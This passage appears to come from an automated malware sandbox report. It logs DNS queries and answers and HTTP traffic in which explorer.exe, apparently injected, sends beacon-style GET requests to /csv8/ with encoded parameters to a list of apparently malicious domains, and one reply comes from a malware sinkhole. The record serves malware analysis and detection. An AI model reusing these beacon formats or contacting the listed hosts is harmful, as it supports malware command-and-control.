                                                                            Jan 13, 2021 21:03:35.866738081 CET53608318.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:36.795548916 CET6010053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:36.847487926 CET53601008.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:38.062551022 CET5319553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:38.110658884 CET53531958.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:39.532286882 CET5014153192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:39.582921982 CET53501418.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:40.645405054 CET5302353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:40.693166971 CET53530238.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:41.567195892 CET4956353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:41.615120888 CET53495638.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:42.791860104 CET5135253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:42.839807034 CET53513528.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:44.707129002 CET5934953192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:44.755547047 CET53593498.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:45.937158108 CET5708453192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:45.985148907 CET53570848.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:47.207340002 CET5882353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:47.255136967 CET53588238.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:48.196248055 CET5756853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:48.245688915 CET53575688.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:50.160382986 CET5054053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:50.214705944 CET53505408.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:03:56.003659010 CET5436653192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:03:56.082838058 CET53543668.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:01.437932014 CET5303453192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:01.485913992 CET53530348.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:15.029310942 CET5776253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:15.086632013 CET53577628.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:19.399761915 CET5543553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:19.448080063 CET53554358.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:20.814989090 CET5071353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:20.875763893 CET53507138.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:26.231012106 CET5613253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:26.644450903 CET5898753192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:26.702014923 CET53589878.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:27.245870113 CET5613253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:28.032321930 CET53561328.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:29.053430080 CET53561328.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:33.048207998 CET5657953192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:33.252438068 CET53565798.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:36.666981936 CET6063353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:36.794030905 CET53606338.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:37.342623949 CET6129253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:37.422462940 CET53612928.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:37.988605022 CET6361953192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:38.044975042 CET53636198.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:38.510776043 CET6493853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:38.567425966 CET53649388.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:38.657728910 CET6194653192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:39.050699949 CET53619468.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:39.057087898 CET6491053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:39.113562107 CET53649108.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:39.671612024 CET5212353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:39.731230974 CET53521238.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:40.546530008 CET5613053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:40.605827093 CET53561308.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:40.704773903 CET5633853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:40.768801928 CET53563388.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:41.428122997 CET5942053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:41.484390974 CET53594208.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:43.052429914 CET5878453192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:43.100449085 CET53587848.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:43.597229958 CET6397853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:43.653685093 CET53639788.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:44.082952976 CET6293853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:44.243922949 CET53629388.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:49.551908016 CET5570853192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:49.624840021 CET53557088.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:54.751828909 CET5680353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:54.836445093 CET53568038.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:04:59.489957094 CET5714553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:04:59.546482086 CET53571458.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:00.530175924 CET5535953192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:00.592801094 CET53553598.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:05.785716057 CET5830653192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:05.850408077 CET53583068.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:10.945827961 CET6412453192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:11.003951073 CET53641248.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:21.233468056 CET4936153192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:21.578461885 CET53493618.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:24.494661093 CET6315053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:25.204083920 CET5327953192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:25.255053043 CET53532798.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:25.516793013 CET6315053192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:25.564650059 CET53631508.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:27.478451014 CET5688153192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:27.704834938 CET53568818.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:33.115914106 CET5364253192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:33.178495884 CET53536428.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:38.215327024 CET5566753192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:38.447403908 CET53556678.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:43.839272976 CET5483353192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:44.220861912 CET53548338.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:49.944683075 CET6247653192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:50.007997036 CET53624768.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:55.316931963 CET4970553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:56.331440926 CET4970553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:57.347142935 CET4970553192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:05:57.374772072 CET53497058.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:58.107872963 CET53497058.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:05:59.126219034 CET53497058.8.8.8192.168.2.3
                                                                            Jan 13, 2021 21:06:07.773875952 CET6147753192.168.2.38.8.8.8
                                                                            Jan 13, 2021 21:06:07.833264112 CET53614778.8.8.8192.168.2.3

                                                                            ICMP Packets

                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                            Jan 13, 2021 21:04:29.053590059 CET192.168.2.38.8.8.8cff4(Port unreachable)Destination Unreachable
                                                                            Jan 13, 2021 21:05:58.107974052 CET192.168.2.38.8.8.8cff4(Port unreachable)Destination Unreachable
                                                                            Jan 13, 2021 21:05:59.126867056 CET192.168.2.38.8.8.8cff4(Port unreachable)Destination Unreachable

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                            Jan 13, 2021 21:04:26.231012106 CET192.168.2.38.8.8.80x918bStandard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:27.245870113 CET192.168.2.38.8.8.80x918bStandard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:33.048207998 CET192.168.2.38.8.8.80x42a0Standard query (0)www.travelnetafrica.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:38.657728910 CET192.168.2.38.8.8.80x8c8cStandard query (0)www.latin-hotspot.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:44.082952976 CET192.168.2.38.8.8.80xdaa8Standard query (0)www.procreditexpert.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:49.551908016 CET192.168.2.38.8.8.80x396cStandard query (0)www.fessusesefsee.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:54.751828909 CET192.168.2.38.8.8.80x6415Standard query (0)www.queensboutique1000.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:00.530175924 CET192.168.2.38.8.8.80xb972Standard query (0)www.studentdividers.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:05.785716057 CET192.168.2.38.8.8.80x8969Standard query (0)www.logansshop.netA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:10.945827961 CET192.168.2.38.8.8.80xdc07Standard query (0)www.epicmassiveconcepts.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:21.233468056 CET192.168.2.38.8.8.80xc400Standard query (0)www.exit-divorce.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:27.478451014 CET192.168.2.38.8.8.80x52c6Standard query (0)www.splendidhotelspa.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:33.115914106 CET192.168.2.38.8.8.80xb023Standard query (0)www.thesouthbeachlife.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:38.215327024 CET192.168.2.38.8.8.80x4d47Standard query (0)www.stnanguo.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:43.839272976 CET192.168.2.38.8.8.80xfcccStandard query (0)www.alparmuhendislik.comA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:49.944683075 CET192.168.2.38.8.8.80x7b79Standard query (0)www.soundon.eventsA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:55.316931963 CET192.168.2.38.8.8.80x8d54Standard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:56.331440926 CET192.168.2.38.8.8.80x8d54Standard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:57.347142935 CET192.168.2.38.8.8.80x8d54Standard query (0)www.herbmedia.netA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:06:07.773875952 CET192.168.2.38.8.8.80x93cdStandard query (0)www.latin-hotspot.comA (IP address)IN (0x0001)

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                            Jan 13, 2021 21:04:28.032321930 CET8.8.8.8192.168.2.30x918bServer failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:29.053430080 CET8.8.8.8192.168.2.30x918bServer failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:33.252438068 CET8.8.8.8192.168.2.30x42a0No error (0)www.travelnetafrica.com173.234.175.134A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:44.243922949 CET8.8.8.8192.168.2.30xdaa8No error (0)www.procreditexpert.comus20-d42e32e7-5da32c142596003de06ec4b5a.pages.mailchi.mpCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:04:44.243922949 CET8.8.8.8192.168.2.30xdaa8No error (0)us20-d42e32e7-5da32c142596003de06ec4b5a.pages.mailchi.mpterminator.capstone.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:04:49.624840021 CET8.8.8.8192.168.2.30x396cNo error (0)www.fessusesefsee.com45.77.226.209A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:04:54.836445093 CET8.8.8.8192.168.2.30x6415No error (0)www.queensboutique1000.comqueensboutique1000.comCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:04:54.836445093 CET8.8.8.8192.168.2.30x6415No error (0)queensboutique1000.com142.44.212.169A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:00.592801094 CET8.8.8.8192.168.2.30xb972No error (0)www.studentdividers.comstudentdividers.comCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:05:00.592801094 CET8.8.8.8192.168.2.30xb972No error (0)studentdividers.com34.102.136.180A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:05.850408077 CET8.8.8.8192.168.2.30x8969No error (0)www.logansshop.netlogansshop.netCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:05:05.850408077 CET8.8.8.8192.168.2.30x8969No error (0)logansshop.net192.0.78.208A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:05.850408077 CET8.8.8.8192.168.2.30x8969No error (0)logansshop.net192.0.78.138A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:11.003951073 CET8.8.8.8192.168.2.30xdc07No error (0)www.epicmassiveconcepts.comepicmassiveconcepts.comCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:05:11.003951073 CET8.8.8.8192.168.2.30xdc07No error (0)epicmassiveconcepts.com34.102.136.180A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:21.578461885 CET8.8.8.8192.168.2.30xc400No error (0)www.exit-divorce.com192.155.166.181A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:27.704834938 CET8.8.8.8192.168.2.30x52c6No error (0)www.splendidhotelspa.comsplendidhotelspa.comCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:05:27.704834938 CET8.8.8.8192.168.2.30x52c6No error (0)splendidhotelspa.com205.134.254.189A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:33.178495884 CET8.8.8.8192.168.2.30xb023Name error (3)www.thesouthbeachlife.comnonenoneA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:38.447403908 CET8.8.8.8192.168.2.30x4d47No error (0)www.stnanguo.com146.148.193.212A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:44.220861912 CET8.8.8.8192.168.2.30xfcccNo error (0)www.alparmuhendislik.com23.105.124.225A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:50.007997036 CET8.8.8.8192.168.2.30x7b79No error (0)www.soundon.eventsext-cust.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                            Jan 13, 2021 21:05:50.007997036 CET8.8.8.8192.168.2.30x7b79No error (0)ext-cust.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:50.007997036 CET8.8.8.8192.168.2.30x7b79No error (0)ext-cust.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:57.374772072 CET8.8.8.8192.168.2.30x8d54Server failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:58.107872963 CET8.8.8.8192.168.2.30x8d54Server failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)
                                                                            Jan 13, 2021 21:05:59.126219034 CET8.8.8.8192.168.2.30x8d54Server failure (2)www.herbmedia.netnonenoneA (IP address)IN (0x0001)

                                                                            HTTP Request Dependency Graph

                                                                            • www.travelnetafrica.com
                                                                            • www.fessusesefsee.com
                                                                            • www.queensboutique1000.com
                                                                            • www.studentdividers.com
                                                                            • www.logansshop.net
                                                                            • www.epicmassiveconcepts.com
                                                                            • www.exit-divorce.com
                                                                            • www.splendidhotelspa.com
                                                                            • www.stnanguo.com
                                                                            • www.alparmuhendislik.com
                                                                            • www.soundon.events

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            0192.168.2.349742173.234.175.13480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:04:33.449708939 CET6475OUTGET /csv8/?t8o8sPp=EQmgoSYDEa5LDPvVC5k82JbrO8g/Lv/s9cEF36fL7P4v8Aj5jRO5aZQhqVXoXMO5wnpv&jBZd=KnhT HTTP/1.1
                                                                            Host: www.travelnetafrica.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:04:33.642399073 CET6476INHTTP/1.1 500 Internal Server Error
                                                                            Cache-Control: private
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Server: Microsoft-IIS/8.5
                                                                            X-AspNet-Version: 4.0.30319
                                                                            X-Powered-By: ASP.NET
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Headers: *
                                                                            Access-Control-Allow-Methods: GET, POST
                                                                            Date: Wed, 13 Jan 2021 20:04:32 GMT
                                                                            Connection: close
                                                                            Content-Length: 4298
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e e5 80 bc e4 b8 8d e8 83 bd e4 b8 ba 20 6e 75 6c 6c e3 80 82 3c 62 72 3e e5 8f 82 e6 95 b0 e5 90 8d 3a 20 69 6e 70 75 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 2e 37 65 6d 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 0d 0a 20 20 20 20 20 20 20 20 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 70 78 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 31 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 74 3b 63 6f 6c 6f 72 3a 72 65 64 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 48 32 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 56 65 72 64 61 6e 61 22 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 74 3b 63 6f 6c 6f 72 3a 6d 61 72 6f 6f 6e 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 70 72 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 43 6f 6e 73 6f 6c 61 73 22 2c 22 4c 75 63 69 64 61 20 43 6f 6e 73 6f 6c 65 22 2c 4d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 74 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 2e 35 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 34 70 74 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 72 6b 65 72 20 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 7d 0d 0a 20 20 20 20 20 20 20 20 20 2e 65 78 70 61 6e 64 61 62 6c 65 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 20 63 6f 6c 6f 72 3a 6e 61 76 79 3b 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 20 7d 0d
                                                                            Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:pointer; }


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.34975545.77.226.20980C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:04:49.690268040 CET9647OUTGET /csv8/?t8o8sPp=+aP4wUbNbXNo+DXgxdcGOO7le47nUjGI8O93VpAmlXcOKCIjUH4+hXL6+b4dsCsJZjty&jBZd=KnhT HTTP/1.1
                                                                            Host: www.fessusesefsee.com
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:04:49.742832899 CET9648INHTTP/1.1 404 Not Found
                                                                            Date: Wed, 13 Jan 2021 20:16:25 GMT
                                                                            Server: X-SinkHole: Malware DNS SinkHole Server
                                                                            Content-Length: 307
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 73 76 38 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 58 2d 53 69 6e 6b 48 6f 6c 65 3a 20 4d 61 6c 77 61 72 65 20 44 4e 53 20 53 69 6e 6b 48 6f 6c 65 20 53 65 72 76 65 72 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 66 65 73 73 75 73 65 73 65 66 73 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /csv8/ was not found on this server.</p><hr><address>X-SinkHole: Malware DNS SinkHole Server Server at www.fessusesefsee.com Port 80</address></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            10192.168.2.349768198.49.23.14480C:\Windows\explorer.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            Jan 13, 2021 21:05:50.138555050 CET9995OUTGET /csv8/?t8o8sPp=f1zFyjNxEhLridJwdKKCz7YQnzvARTiViSvHXssl+N40gmlvXkDdEguhFCZDVR0rFwZR&jBZd=KnhT HTTP/1.1
                                                                            Host: www.soundon.events
                                                                            Connection: close
                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                            Data Ascii:
                                                                            Jan 13, 2021 21:05:50.268177986 CET9996INHTTP/1.1 400 Bad Request
                                                                            Cache-Control: no-cache, must-revalidate
                                                                            Content-Length: 77564
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Date: Wed, 13 Jan 2021 20:05:50 UTC
                                                                            Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                            Pragma: no-cache
                                                                            Server: Squarespace
                                                                            X-Contextid: evn59O79/p8IFMy6X
                                                                            Connection: close
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 